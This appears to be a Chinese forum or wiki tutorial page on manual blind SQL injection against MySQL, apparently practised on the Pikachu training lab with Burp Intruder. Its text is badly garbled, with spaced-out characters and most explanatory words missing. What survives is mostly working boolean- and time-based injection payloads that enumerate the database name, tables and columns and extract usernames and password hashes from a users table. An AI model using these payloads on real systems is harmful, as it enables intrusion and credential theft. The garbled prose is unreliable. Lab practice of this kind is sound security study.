[20338] 2020-06-26_Mysql手工盲注

文档创建者:s7ckTeam
浏览次数:5
最后更新:2025-01-18
2020-06-26_Mysql手工盲注 M y s q l K h a n   2 0 2 0 - 0 6 - 2 6 P t T e a m   H o l y m a n         B o o l i a n b u r p 西 0 1 M y s q l M e M e s q l s q l s q l 0 2 B o o l i a n _ p a y l o a d 1 p a y l o a d 2 P t T e a m   . P t - T e a m w e b
o r d e r   b y 2 . . 0 3 B o o l i a n _ a s c i i ( ) s u b s t r ( ) a s c i i . .       1 . b u r p § a §         2 . G E T p a y l o a d u r l u r l b u r p c t r l + u
        1 . l e f t / /         2 . l e f t 2 '   a n d   l e n g t h ( d a t a b a s e ( ) ) = § a § - - +   '   a n d   l e f t ( d a t a b a s e ( ) , 1 ) = ' § a § ' - - +
        1 . l e f t 1 2         2 . p   p i k a c h u p i k a c h u h '   a n d   l e f t ( d a t a b a s e ( ) , 2 ) > ' p § a § ' - - + '   a n d   l e f t ( ( s e l e c t   t a b l e _ n a m e   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a = ' p i k a c h u '   l i m i t   0 , 1 ) , 1 ) = ' § a § ' - - + '   a n d   l e f t ( ( s e l e c t   t a b l e _ n a m e   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a = ' p i k a c h u '   l i m i t   0 , 1 ) , 2 ) = ' h § a § ' - - +
p i k a c h u t p i k a c h u m '   a n d   l e f t ( ( s e l e c t   t a b l e _ n a m e   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a = ' p i k a c h u '   l i m i t   1 , 1 ) , 1 ) = ' § a § ' - - +
( h t t p i n f o , m e m b e r , m e s s a g e , u s e r s , x s s b l i n d ) u s e r s p a y l o a d l e f t u s e r s u s e r s u s e r s '   a n d   l e f t ( ( s e l e c t   c o l u m n _ n a m e   f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e   t a b l e _ n a m e = " u s e r s "   l i m i t   0 , 1 ) , 1 ) = ' § a § ' - - + '   a n d   l e f t ( ( s e l e c t   c o l u m n _ n a m e   f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e   t a b l e _ n a m e = " u s e r s "   l i m i t   0 , 1 ) , 2 ) = ' u § a § ' - - + '   a n d   l e f t ( ( s e l e c t   c o l u m n _ n a m e   f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e   t a b l e _ n a m e = " u s e r s "   l i m i t   1 , 1 ) , 1 ) = ' § a § ' - - + '   a n d   l e f t ( ( s e l e c t   c o l u m n _ n a m e   f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e   t a b l e _ n a m e = " u s e r s "   l i m i t   1 , 1 ) , 2 ) = ' f § a § ' - - +
u s e r n a m e , p a s s w o r d u s e r n a m e , p a s s w o r d u s e r n a m e u s e r n a m e p a s s w o r d '   a n d   l e f t ( ( s e l e c t   u s e r n a m e   f r o m   u s e r s   l i m i t   0 , 1 ) , 1 ) = ' § a § ' - - + '   a n d   l e f t ( ( s e l e c t   u s e r n a m e   f r o m   u s e r s   l i m i t   0 , 1 ) , 2 ) = ' a § a § ' - - + '   a n d   l e f t ( ( s e l e c t   p a s s w o r d   f r o m   u s e r s   l i m i t   0 , 1 ) , 1 ) = ' § a § ' - - +
p a s s w o r d m d 5 a d m i n 1 2 3 4 5 6 0 4 0 5 '   a n d   l e f t ( ( s e l e c t   u s e r n a m e   f r o m   u s e r s   l i m i t   0 , 1 ) , 2 ) = ' e § a § ' - - +
p a y l o a d p a y l o a d '   a n d   s l e e p ( 3 ) # ' a n d   i f ( l e n g t h ( d a t a b a s e ( ) ) = 1 , 1 , s l e e p ( 3 ) ) #
0 6 ' a n d   i f ( l e n g t h ( d a t a b a s e ( ) ) = 7 , 1 , s l e e p ( 0 . 5 ) ) #
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则